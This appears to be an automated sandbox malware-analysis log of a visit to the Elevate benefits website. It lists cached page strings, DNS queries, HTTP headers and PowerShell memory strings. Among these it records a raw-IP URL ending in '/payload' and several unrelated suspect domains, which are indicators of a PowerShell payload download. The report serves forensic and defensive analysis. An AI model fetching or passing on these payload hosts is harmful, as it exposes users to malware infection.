id="w-node-e8752316-6fa4-2c6f-810e-6eb3ccffc1d9-0c789839" class="grid-item is-footer-nav-links"><div class="text-weight-bold">For Developers</div><a href="/legal/security" class="footer_link">Security</a></div><div id="w-node-bb621407-b79d-e009-0a2a-aa80bc3eb169-0c789839" class="grid-item is-footer-nav-links"><div class="text-weight-bold">Follow Us</div><div class="button-wrapper"><a aria-label="X link" href="https://twitter.com/elevatedotinc" target="_blank" class="footer_link w-inline-block"><div class="icon-1x1-small is-footer w-embed"><svg xmlns="http://www.w3.org/2000/svg" width="100%" height="100%" fill="currentColor" class="bi bi-twitter-x" viewBox="0 0 16 16"> equals www.twitter.com (Twitter)
Source: chromecache_242.1.dr	String found in binary or memory: </script></div><div fs-cmsfilter-element="empty" class="resources_filtering-empty"><div class="heading-style-h5">No results found.</div></div></div></div></div></div></section><section id="newsletter-form" class="section-content-cta"><div class="padding-global"><div class="container-large"><div class="padding-vertical padding-xlarge"><div class="grid is-content-cta"><div id="w-node-d0db4f55-9126-ba41-0670-93ac076d0cd8-076d0cd3" class="grid-item"><h2 class="text-weight-light text-color-white heading-style-h5 is-content-cta-heading">Stay ahead of the curve with key industry insights and milestone updates about what Elevate can do for you.</h2></div><div id="w-node-d0db4f55-9126-ba41-0670-93ac076d0cdb-076d0cd3" class="grid-item"><div class="form_component w-form"><form id="wf-form-Content-CTA" name="wf-form-Content-CTA" data-name="Content CTA" method="get" class="form_form is-content-cta" data-wf-page-id="65ab064ab380a3e2c2b752d4" data-wf-element-id="d0db4f55-9126-ba41-0670-93ac076d0cdd" data-turnstile-sitekey="0x4AAAAAAAQTptj2So4dx43e"><div class="form_field-wrapper"><input class="form_input is-content-cta w-input" maxlength="256" name="Email-2" data-name="Email 2" placeholder="e.g., john.smith@elevate.com" type="email" id="Email-2" required=""/></div><input type="submit" data-wait="Please wait..." class="button is-form-submit is-content-cta w-button" value="Submit"/></form><div class="form_message-success w-form-done"><div>Thank you! You're successfully signed up.</div></div><div class="form_message-error w-form-fail"><div>Oops! Something went wrong while submitting the form.</div></div></div></div></div></div></div></div></section></main><section class="footer_component"><div class="padding-global"><div class="container-full-width"><div class="grid is-footer-upper"><div id="w-node-_7cec7fe0-0a59-f095-88e1-b2723cfb2839-0c789839" class="grid is-footer-nav"><div id="w-node-e8752316-6fa4-2c6f-810e-6eb3ccffc1d9-0c789839" class="grid-item is-footer-nav-links"><div class="text-weight-bold">For Developers</div><a href="/legal/security" class="footer_link">Security</a></div><div id="w-node-bb621407-b79d-e009-0a2a-aa80bc3eb169-0c789839" class="grid-item is-footer-nav-links"><div class="text-weight-bold">Follow Us</div><div class="button-wrapper"><a aria-label="X link" href="https://twitter.com/elevatedotinc" target="_blank" class="footer_link w-inline-block"><div class="icon-1x1-small is-footer w-embed"><svg xmlns="http://www.w3.org/2000/svg" width="100%" height="100%" fill="currentColor" class="bi bi-twitter-x" viewBox="0 0 16 16"> equals www.twitter.com (Twitter)
Source: chromecache_304.1.dr, chromecache_307.1.dr	String found in binary or memory: </svg></div></a></div></div></div></div></section></main><section class="footer_component"><div class="padding-global"><div class="container-full-width"><div class="grid is-footer-upper"><div id="w-node-_7cec7fe0-0a59-f095-88e1-b2723cfb2839-0c789839" class="grid is-footer-nav"><div id="w-node-e8752316-6fa4-2c6f-810e-6eb3ccffc1d9-0c789839" class="grid-item is-footer-nav-links"><div class="text-weight-bold">For Developers</div><a href="/legal/security" class="footer_link">Security</a></div><div id="w-node-bb621407-b79d-e009-0a2a-aa80bc3eb169-0c789839" class="grid-item is-footer-nav-links"><div class="text-weight-bold">Follow Us</div><div class="button-wrapper"><a aria-label="X link" href="https://twitter.com/elevatedotinc" target="_blank" class="footer_link w-inline-block"><div class="icon-1x1-small is-footer w-embed"><svg xmlns="http://www.w3.org/2000/svg" width="100%" height="100%" fill="currentColor" class="bi bi-twitter-x" viewBox="0 0 16 16"> equals www.twitter.com (Twitter)
Source: chromecache_281.1.dr, chromecache_309.1.dr, chromecache_242.1.dr, chromecache_357.1.dr, chromecache_286.1.dr, chromecache_320.1.dr, chromecache_344.1.dr, chromecache_234.1.dr, chromecache_237.1.dr, chromecache_304.1.dr, chromecache_310.1.dr, chromecache_220.1.dr	String found in binary or memory: </svg></div></a><a aria-label="LinkedIn link" href="https://www.linkedin.com/company/elevatedotinc" target="_blank" class="footer_link w-inline-block"><div class="icon-1x1-small is-footer w-embed"><svg xmlns="http://www.w3.org/2000/svg" width="100%" height="100%" fill="currentColor" class="bi bi-linkedin" viewBox="0 0 16 16"> equals www.linkedin.com (Linkedin)
Source: chromecache_286.1.dr	String found in binary or memory: </svg></div></a><div class="faq_spacer is-small"></div></nav></div></div></div></div></div></div></div></div></div></div></div></section></main><section class="footer_component"><div class="padding-global"><div class="container-full-width"><div class="grid is-footer-upper"><div id="w-node-_7cec7fe0-0a59-f095-88e1-b2723cfb2839-0c789839" class="grid is-footer-nav"><div id="w-node-e8752316-6fa4-2c6f-810e-6eb3ccffc1d9-0c789839" class="grid-item is-footer-nav-links"><div class="text-weight-bold">For Developers</div><a href="/legal/security" class="footer_link">Security</a></div><div id="w-node-bb621407-b79d-e009-0a2a-aa80bc3eb169-0c789839" class="grid-item is-footer-nav-links"><div class="text-weight-bold">Follow Us</div><div class="button-wrapper"><a aria-label="X link" href="https://twitter.com/elevatedotinc" target="_blank" class="footer_link w-inline-block"><div class="icon-1x1-small is-footer w-embed"><svg xmlns="http://www.w3.org/2000/svg" width="100%" height="100%" fill="currentColor" class="bi bi-twitter-x" viewBox="0 0 16 16"> equals www.twitter.com (Twitter)
Source: chromecache_281.1.dr	String found in binary or memory: </svg></div></div></div></div></div></div></section><section class="section-features1"><div class="padding-global"><div class="container-xlarge"><div class="padding-section-xlarge"><div class="gap-vertical-medium"><div class="stats_header-wrapper"><div class="text-align-center text-color-black"><div class="gap-vertical-normal"><h2 class="heading-style-h3 text-weight-light">We're building the future of benefits</h2><div class="max-width-custom align-center"><p>Say hello to the most innovative team in the consumer benefits industry.</p></div></div></div></div><div class="os_team-section"><div class="gap-vertical-normal is-os-team"><div class="text-align-center"><h3 class="heading-style-h4 text-color-black text-weight-normal">Executive team</h3></div><div class="team_collection-list-wrapper w-dyn-list"><div role="list" class="grid is-team-members is-top w-dyn-items"><div role="listitem" class="team-member_card-wrapper w-dyn-item"><div class="team-member_component"><img src="https://cdn.prod.website-files.com/654105530b98111cede036db/65b10e11b402fcba62fbb340_brian_cosgray.avif" loading="lazy" alt="" class="team-member_image"/><div data-hover="false" data-delay="0" data-w-id="4390835c-7d67-7a38-d7e7-244d714392e2" class="faq_item is-team-member w-dropdown"><div class="faq_toggle w-dropdown-toggle"><div class="team-member_details-wrapper"><a href="https://www.linkedin.com/in/cosgray/" class="text-size-regular text-weight-semibold is-team-member-name text-style-muted">Brian Cosgray</a><div class="team-member_role-max-width">Co-Founder, CEO, and Board Member</div></div><div class="faq_item-icon w-embed"><svg width="20" height="12" viewBox="0 0 20 12" fill="none" xmlns="http://www.w3.org/2000/svg"> equals www.linkedin.com (Linkedin)
Source: chromecache_320.1.dr, chromecache_344.1.dr, chromecache_234.1.dr, chromecache_310.1.dr, chromecache_220.1.dr	String found in binary or memory: </svg></div></div></div></div><div class="related-content_card-label"><div fs-cmsfilter-field="type">Press Release</div></div></a></div></div></div><a fs-cmssort-reverse="true" fs-cmssort-element="trigger" fs-cmssort-field="date" href="#" class="fs_cmssort_button w-button">Button Text</a></div></div></div></div></section><section class="section-cta2"><div class="padding-global"><div class="container-large"><div class="padding-section-xlarge"><div class="text-align-center text-color-white"><div class="gap-vertical-normal is-align-center"><div class="max-width-custom7"><h2 class="heading-style-h3 text-weight-light">Ready to say goodbye to your pain points one by one?</h2></div><div class="max-width-custom align-center"><p>Schedule a demo today to see how Elevate can drive your business to new heights.</p></div><a href="/request-a-demo" class="button is-black w-button">Get a Demo</a></div></div></div></div></div></section></main><section class="footer_component"><div class="padding-global"><div class="container-full-width"><div class="grid is-footer-upper"><div id="w-node-_7cec7fe0-0a59-f095-88e1-b2723cfb2839-0c789839" class="grid is-footer-nav"><div id="w-node-e8752316-6fa4-2c6f-810e-6eb3ccffc1d9-0c789839" class="grid-item is-footer-nav-links"><div class="text-weight-bold">For Developers</div><a href="/legal/security" class="footer_link">Security</a></div><div id="w-node-bb621407-b79d-e009-0a2a-aa80bc3eb169-0c789839" class="grid-item is-footer-nav-links"><div class="text-weight-bold">Follow Us</div><div class="button-wrapper"><a aria-label="X link" href="https://twitter.com/elevatedotinc" target="_blank" class="footer_link w-inline-block"><div class="icon-1x1-small is-footer w-embed"><svg xmlns="http://www.w3.org/2000/svg" width="100%" height="100%" fill="currentColor" class="bi bi-twitter-x" viewBox="0 0 16 16"> equals www.twitter.com (Twitter)
Source: chromecache_286.1.dr	String found in binary or memory: </svg></div></div></div><nav style="height:0px" class="faq_dropdown-list w-dropdown-list"><div class="faq_spacer"></div><div class="faq_paragraph text-style-muted w-richtext"><p>Stay ahead of the curve by <a href="/resource-center#newsletter-form">signing up for news and updates</a> from the experts at Elevate. Follow us on <a href="https://www.linkedin.com/company/elevatedotinc" target="_blank">LinkedIn</a> and <a href="https://twitter.com/elevatedotinc" target="_blank">X</a> for more updates.</p></div><a href="#" class="text-style-link-block text-color-captivate-blue is-faq w-inline-block w-condition-invisible"><div class="text-weight-medium">This is some text inside of a div block.</div><div class="icon-1x1-xsmall w-embed"><svg width="100%" height="100%" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg"> equals www.linkedin.com (Linkedin)
Source: chromecache_286.1.dr	String found in binary or memory: </svg></div></div></div><nav style="height:0px" class="faq_dropdown-list w-dropdown-list"><div class="faq_spacer"></div><div class="faq_paragraph text-style-muted w-richtext"><p>Stay ahead of the curve by <a href="/resource-center#newsletter-form">signing up for news and updates</a> from the experts at Elevate. Follow us on <a href="https://www.linkedin.com/company/elevatedotinc" target="_blank">LinkedIn</a> and <a href="https://twitter.com/elevatedotinc" target="_blank">X</a> for more updates.</p></div><a href="#" class="text-style-link-block text-color-captivate-blue is-faq w-inline-block w-condition-invisible"><div class="text-weight-medium">This is some text inside of a div block.</div><div class="icon-1x1-xsmall w-embed"><svg width="100%" height="100%" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg"> equals www.twitter.com (Twitter)
Source: chromecache_281.1.dr	String found in binary or memory: </svg></div></div><nav class="faq_dropdown-list w-dropdown-list"><p class="faq_paragraph is-no-bottom-padding">Alicia brings a deep background in consumer account marketing to Elevate. She is responsible for leading end-to-end marketing initiatives that promote corporate visibility and support business growth. Prior to this role, Alicia held marketing leadership roles at Optum and ConnectYourCare.</p></nav></div></div></div><div role="listitem" class="team-member_card-wrapper w-dyn-item"><div class="team-member_component"><img src="https://cdn.prod.website-files.com/654105530b98111cede036db/65b10658f3e7ba1d16577ccd_amanda_richter.jpg" loading="lazy" alt="" class="team-member_image"/><div data-hover="false" data-delay="0" data-w-id="4390835c-7d67-7a38-d7e7-244d714392e2" class="faq_item is-team-member w-dropdown"><div class="faq_toggle w-dropdown-toggle"><div class="team-member_details-wrapper"><a href="https://www.linkedin.com/in/amanda-richter-4a22a5215/" class="text-size-regular text-weight-semibold is-team-member-name text-style-muted">Amanda Richter</a><div class="team-member_role-max-width">Head of Product</div></div><div class="faq_item-icon w-embed"><svg width="20" height="12" viewBox="0 0 20 12" fill="none" xmlns="http://www.w3.org/2000/svg"> equals www.linkedin.com (Linkedin)
Source: chromecache_281.1.dr	String found in binary or memory: </svg></div></div><nav class="faq_dropdown-list w-dropdown-list"><p class="faq_paragraph is-no-bottom-padding">Brian is a visionary, leading Elevate in leveraging the latest financial technology that makes consumer directed benefits easier to understand and use for employees and their families. Prior to founding Elevate, Brian led the team at Businessolver that developed and launched a proprietary, in-house consumer directed benefits solution for Fortune 100, state government, and mid-sized business clients.</p></nav></div></div></div><div role="listitem" class="team-member_card-wrapper w-dyn-item"><div class="team-member_component"><img src="https://cdn.prod.website-files.com/654105530b98111cede036db/65b0328612c05e43c82dd6e2_brian_strom.avif" loading="lazy" alt="" class="team-member_image"/><div data-hover="false" data-delay="0" data-w-id="4390835c-7d67-7a38-d7e7-244d714392e2" class="faq_item is-team-member w-dropdown"><div class="faq_toggle w-dropdown-toggle"><div class="team-member_details-wrapper"><a href="https://www.linkedin.com/in/bstrom/" class="text-size-regular text-weight-semibold is-team-member-name text-style-muted">Brian Strom</a><div class="team-member_role-max-width">Co-Founder, CTO, and Board Member</div></div><div class="faq_item-icon w-embed"><svg width="20" height="12" viewBox="0 0 20 12" fill="none" xmlns="http://www.w3.org/2000/svg"> equals www.linkedin.com (Linkedin)
Source: chromecache_281.1.dr	String found in binary or memory: </svg></div></div><nav class="faq_dropdown-list w-dropdown-list"><p class="faq_paragraph is-no-bottom-padding">Keith is a seasoned Employee Benefits and Financial Services executive who combines his extensive experience in solution selling, partnerships, and business development with a genuine passion for creating visionary strategies and delivering successful outcomes. Keith previously led sales teams at Businessolver, WageWorks, and DoubleNet Pay.</p></nav></div></div></div><div role="listitem" class="team-member_card-wrapper w-dyn-item"><div class="team-member_component"><img src="https://cdn.prod.website-files.com/654105530b98111cede036db/662bc7bb42f8bf4f9b69b810_Untitled%20design-5.avif" loading="lazy" alt="" class="team-member_image"/><div data-hover="false" data-delay="0" data-w-id="4390835c-7d67-7a38-d7e7-244d714392e2" class="faq_item is-team-member w-dropdown"><div class="faq_toggle w-dropdown-toggle"><div class="team-member_details-wrapper"><a href="https://www.linkedin.com/in/aliciamainoberg/" class="text-size-regular text-weight-semibold is-team-member-name text-style-muted">Alicia Oberg</a><div class="team-member_role-max-width">SVP, Marketing</div></div><div class="faq_item-icon w-embed"><svg width="20" height="12" viewBox="0 0 20 12" fill="none" xmlns="http://www.w3.org/2000/svg"> equals www.linkedin.com (Linkedin)
Source: chromecache_258.1.dr	String found in binary or memory: Bu();cp(function(){a();$o(b)\|\|hn(a,b)},b)},Bu=function(){return[K.m.V,K.m.W]},Cu=/^(?:www\.)?google(?:\.com?)?(?:\.[a-z]{2}t?)?$/,Du=/^www\.googleadservices\.com$/,Hu=/^gad_source[_=](\d+)$/;function Mu(){return kp("dedupe_gclid",function(){return as()})};var Nu=/^(www\.)?google(\.com?)?(\.[a-z]{2}t?)?$/,Ou=/^www.googleadservices.com$/;function Pu(a){a\|\|(a=Qu());return a.tq?!1:a.qp\|\|a.rp\|\|a.vp\|\|a.tp\|\|a.Tf\|\|a.Yo\|\|a.up\|\|a.ep?!0:!1}function Qu(){var a={},b=Fs(!0);a.tq=!!b._up;var c=$t();a.qp=c.aw!==void 0;a.rp=c.dc!==void 0;a.vp=c.wbraid!==void 0;a.tp=c.gbraid!==void 0;a.up=c.gclsrc==="aw.ds";a.Tf=zu().Tf;var d=y.referrer?Bk(Hk(y.referrer),"host"):"";a.ep=Nu.test(d);a.Yo=Ou.test(d);return a};function Ru(a){var b=window,c=b.webkit;delete b.webkit;a(b.webkit);b.webkit=c}function Su(a){var b={action:"gcl_setup"};if("CWVWebViewMessage"in a.messageHandlers)return a.messageHandlers.CWVWebViewMessage.postMessage({command:"awb",payload:b}),!0;var c=a.messageHandlers.awb;return c?(c.postMessage(b),!0):!1};function Tu(){return["ad_storage","ad_user_data"]}function Uu(a){if(D(38)&&!ao(Wn.yl)&&"webkit"in window&&window.webkit.messageHandlers){var b=function(){try{Ru(function(c){c&&("CWVWebViewMessage"in c.messageHandlers\|\|"awb"in c.messageHandlers)&&($n(Wn.yl,function(d){d.gclid&&du(d.gclid,a)}),Su(c)\|\|M(178))})}catch(c){M(177)}};gn(function(){Dt(Tu())?b():hn(b,Tu())},Tu())}};var Vu=["https://www.google.com","https://www.youtube.com","https://m.youtube.com"]; equals www.youtube.com (Youtube)
Source: chromecache_329.1.dr, chromecache_258.1.dr	String found in binary or memory: Math.round(q);v["gtm.videoElapsedTime"]=Math.round(f);v["gtm.videoPercent"]=r;v["gtm.videoVisible"]=t;return v},zm:function(){e=ub()},ke:function(){d()}}};var ec=wa(["data-gtm-yt-inspected-"]),BI=["www.youtube.com","www.youtube-nocookie.com"],CI,DI=!1; equals www.youtube.com (Youtube)
Source: chromecache_329.1.dr, chromecache_258.1.dr	String found in binary or memory: c?"runIfCanceled":"runIfUncanceled",[]);if(!g.length)return!0;var h=oF(a,c,e);M(121);if(h["gtm.elementUrl"]==="https://www.facebook.com/tr/")return M(122),!0;if(d&&f){for(var m=Eb(b,g.length),n=0;n<g.length;++n)g[n](h,m);return m.done}for(var p=0;p<g.length;++p)g[p](h,function(){});return!0},rF=function(){var a=[],b=function(c){return jb(a,function(d){return d.form===c})};return{store:function(c,d){var e=b(c);e?e.button=d:a.push({form:c,button:d})},get:function(c){var d=b(c);return d?d.button:null}}}, equals www.facebook.com (Facebook)
Source: chromecache_329.1.dr, chromecache_258.1.dr	String found in binary or memory: if(!(f\|\|g\|\|h\|\|m.length\|\|n.length))return;var q={bj:f,Zi:g,aj:h,Hj:m,Ij:n,Sf:p,ac:e},r=l.YT;if(r)return r.ready&&r.ready(d),e;var t=l.onYouTubeIframeAPIReady;l.onYouTubeIframeAPIReady=function(){t&&t();d()};A(function(){for(var u=y.getElementsByTagName("script"),v=u.length,w=0;w<v;w++){var x=u[w].getAttribute("src");if(MI(x,"iframe_api")\|\|MI(x,"player_api"))return e}for(var z=y.getElementsByTagName("iframe"),C=z.length,E=0;E<C;E++)if(!DI&&KI(z[E],q.Sf))return xc("https://www.youtube.com/iframe_api"), equals www.youtube.com (Youtube)
Source: chromecache_265.1.dr, chromecache_336.1.dr, chromecache_351.1.dr, chromecache_282.1.dr	String found in binary or memory: return f}zI.N="internal.enableAutoEventOnTimer";var ec=wa(["data-gtm-yt-inspected-"]),BI=["www.youtube.com","www.youtube-nocookie.com"],CI,DI=!1; equals www.youtube.com (Youtube)
Source: chromecache_281.1.dr	String found in binary or memory: s applying all the lessons learned from two decades of experience to the Elevate platform.</p></nav></div></div></div><div role="listitem" class="team-member_card-wrapper w-dyn-item"><div class="team-member_component"><img src="https://cdn.prod.website-files.com/654105530b98111cede036db/65b0331343d43ce1ebff16e9_scott_rose.avif" loading="lazy" alt="" class="team-member_image"/><div data-hover="false" data-delay="0" data-w-id="4390835c-7d67-7a38-d7e7-244d714392e2" class="faq_item is-team-member w-dropdown"><div class="faq_toggle w-dropdown-toggle"><div class="team-member_details-wrapper"><a href="https://www.linkedin.com/in/scottrosecoo/" class="text-size-regular text-weight-semibold is-team-member-name text-style-muted">Scott Rose</a><div class="team-member_role-max-width">COO</div></div><div class="faq_item-icon w-embed"><svg width="20" height="12" viewBox="0 0 20 12" fill="none" xmlns="http://www.w3.org/2000/svg"> equals www.linkedin.com (Linkedin)
Source: chromecache_281.1.dr	String found in binary or memory: t require help, but his team is ready to deliver an outstanding experience should they ever need it.</p></nav></div></div></div><div role="listitem" class="team-member_card-wrapper w-dyn-item"><div class="team-member_component"><img src="https://cdn.prod.website-files.com/654105530b98111cede036db/65b1034cafa8fa3df2e925c8_keith_soranno.avif" loading="lazy" alt="" class="team-member_image"/><div data-hover="false" data-delay="0" data-w-id="4390835c-7d67-7a38-d7e7-244d714392e2" class="faq_item is-team-member w-dropdown"><div class="faq_toggle w-dropdown-toggle"><div class="team-member_details-wrapper"><a href="https://www.linkedin.com/in/keithsoranno/" class="text-size-regular text-weight-semibold is-team-member-name text-style-muted">Keith Soranno</a><div class="team-member_role-max-width">EVP, Sales</div></div><div class="faq_item-icon w-embed"><svg width="20" height="12" viewBox="0 0 20 12" fill="none" xmlns="http://www.w3.org/2000/svg"> equals www.linkedin.com (Linkedin)
Source: chromecache_329.1.dr, chromecache_258.1.dr	String found in binary or memory: var OH=function(a,b,c,d,e){var f=ME("fsl",c?"nv.mwt":"mwt",0),g;g=c?ME("fsl","nv.ids",[]):ME("fsl","ids",[]);if(!g.length)return!0;var h=RE(a,"gtm.formSubmit",g),m=a.action;m&&m.tagName&&(m=a.cloneNode(!1).action);M(121);if(m==="https://www.facebook.com/tr/")return M(122),!0;h["gtm.elementUrl"]=m;h["gtm.formCanceled"]=c;a.getAttribute("name")!=null&&(h["gtm.interactedFormName"]=a.getAttribute("name"));e&&(h["gtm.formSubmitElement"]=e,h["gtm.formSubmitElementText"]=e.value);if(d&&f){if(!iD(h,kD(b, equals www.facebook.com (Facebook)

Source: global traffic	DNS traffic detected: DNS query: www.elevate.inc
Source: global traffic	DNS traffic detected: DNS query: cdn.prod.website-files.com
Source: global traffic	DNS traffic detected: DNS query: player.vimeo.com
Source: global traffic	DNS traffic detected: DNS query: d3e54v103j8qbb.cloudfront.net
Source: global traffic	DNS traffic detected: DNS query: cdn.mida.so
Source: global traffic	DNS traffic detected: DNS query: cdn.jsdelivr.net
Source: global traffic	DNS traffic detected: DNS query: js.hs-scripts.com
Source: global traffic	DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: user.elevateaccounts.com
Source: global traffic	DNS traffic detected: DNS query: js.hs-banner.com
Source: global traffic	DNS traffic detected: DNS query: js.hscollectedforms.net
Source: global traffic	DNS traffic detected: DNS query: js.hs-analytics.net
Source: global traffic	DNS traffic detected: DNS query: challenges.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: js.hsadspixel.net
Source: global traffic	DNS traffic detected: DNS query: api.mida.so
Source: global traffic	DNS traffic detected: DNS query: reefe.com.au
Source: global traffic	DNS traffic detected: DNS query: api.hubapi.com
Source: global traffic	DNS traffic detected: DNS query: forms.hscollectedforms.net
Source: global traffic	DNS traffic detected: DNS query: snap.licdn.com
Source: global traffic	DNS traffic detected: DNS query: www.clarity.ms
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: td.doubleclick.net
Source: global traffic	DNS traffic detected: DNS query: forms.hsforms.com
Source: global traffic	DNS traffic detected: DNS query: px.ads.linkedin.com
Source: global traffic	DNS traffic detected: DNS query: 2captcha.com
Source: global traffic	DNS traffic detected: DNS query: googleads.g.doubleclick.net
Source: global traffic	DNS traffic detected: DNS query: www.linkedin.com
Source: global traffic	DNS traffic detected: DNS query: k.clarity.ms
Source: global traffic	DNS traffic detected: DNS query: track.hubspot.com
Source: global traffic	DNS traffic detected: DNS query: c.clarity.ms
Source: global traffic	DNS traffic detected: DNS query: fresnel.vimeocdn.com
Source: global traffic	DNS traffic detected: DNS query: i.vimeocdn.com
Source: global traffic	DNS traffic detected: DNS query: f.vimeocdn.com
Source: global traffic	DNS traffic detected: DNS query: lensflare.vimeo.com
Source: global traffic	DNS traffic detected: DNS query: arclight.vimeo.com
Source: global traffic	DNS traffic detected: DNS query: vimeo.com
Source: global traffic	DNS traffic detected: DNS query: coreun.com
Source: global traffic	DNS traffic detected: DNS query: www.serranoweb.com

Source: unknown

HTTP traffic detected: POST /init/uuid HTTP/1.1host: api.mida.socontent-length: 348sec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"content-type: text/plainsec-ch-ua-mobile: ?0accept: */*origin: https://www.elevate.incsec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptyreferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 06 Jun 2025 22:55:40 GMTContent-Type: text/html; charset=UTF-8Content-Length: 10898Connection: closeaccept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UAcf-mitigated: challengecritical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UAcross-origin-embedder-policy: require-corpcross-origin-opener-policy: same-origincross-origin-resource-policy: same-originorigin-agent-cluster: ?1permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()referrer-policy: same-originserver-timing: chlray;desc="94bb7fa5a94d2e61"x-content-type-options: nosniffx-frame-options: SAMEORIGINCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:

Source: powershell.exe, 00000011.00000002.1613979532.0000019151FEF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://74.208.195.188:5927
Source: powershell.exe, 00000011.00000002.1613979532.0000019151FEF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://74.208.195.188:5927/payload
Source: powershell.exe, 00000011.00000002.1613979532.0000019151FEF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://74.208.195.188:5927/payload(
Source: powershell.exe, 00000011.00000002.1613979532.0000019151FEF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://74.208.195.188:59272
Source: powershell.exe, 0000000E.00000002.1550102765.000001CBA6D7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://coreun.com
Source: powershell.exe, 00000011.00000002.1617422054.0000019169275000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m
Source: chromecache_284.1.dr	String found in binary or memory: http://hubs.ly/H0702_H0
Source: powershell.exe, 0000000E.00000002.1554282826.000001CBB55C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1550102765.000001CBA6DF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1554282826.000001CBB5487000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1616469530.0000019160A07000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1616469530.0000019160B47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000E.00000002.1550102765.000001CBA563C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1613979532.0000019150BBE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000011.00000002.1613979532.0000019150BBE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.pngh
Source: powershell.exe, 0000000E.00000002.1550102765.000001CBA5411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1613979532.0000019150991000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000011.00000002.1613979532.0000019151F9A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://serranoweb.com
Source: chromecache_277.1.dr	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000000E.00000002.1550102765.000001CBA563C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1613979532.0000019150BBE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000011.00000002.1613979532.0000019150BBE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlh
Source: chromecache_259.1.dr, chromecache_330.1.dr	String found in binary or memory: http://www.hubspot.com
Source: powershell.exe, 0000000E.00000002.1556384071.000001CBBD810000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.coY
Source: powershell.exe, 00000011.00000002.1613979532.0000019151F9A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.serranoweb.com
Source: chromecache_357.1.dr, chromecache_304.1.dr	String found in binary or memory: http://www.smartcustomerservice.com/Columns/Vendor-Views/An-Efficiency-Approach-Leads-the-Contact-Ce
Source: chromecache_257.1.dr	String found in binary or memory: https://2captcha.com/dist/web/assets/google-privacy-policy-Cb0CGVRT.svg
Source: chromecache_265.1.dr, chromecache_336.1.dr, chromecache_351.1.dr, chromecache_282.1.dr, chromecache_329.1.dr, chromecache_258.1.dr	String found in binary or memory: https://ad.doubleclick.net/activity;
Source: chromecache_265.1.dr, chromecache_336.1.dr, chromecache_351.1.dr, chromecache_282.1.dr, chromecache_329.1.dr, chromecache_258.1.dr	String found in binary or memory: https://ad.doubleclick.net/activity;register_conversion=1;
Source: chromecache_265.1.dr, chromecache_336.1.dr, chromecache_351.1.dr, chromecache_282.1.dr, chromecache_329.1.dr, chromecache_258.1.dr	String found in binary or memory: https://ade.googlesyndication.com/ddm/activity/
Source: chromecache_258.1.dr	String found in binary or memory: https://adservice.google.com/pagead/regclk?
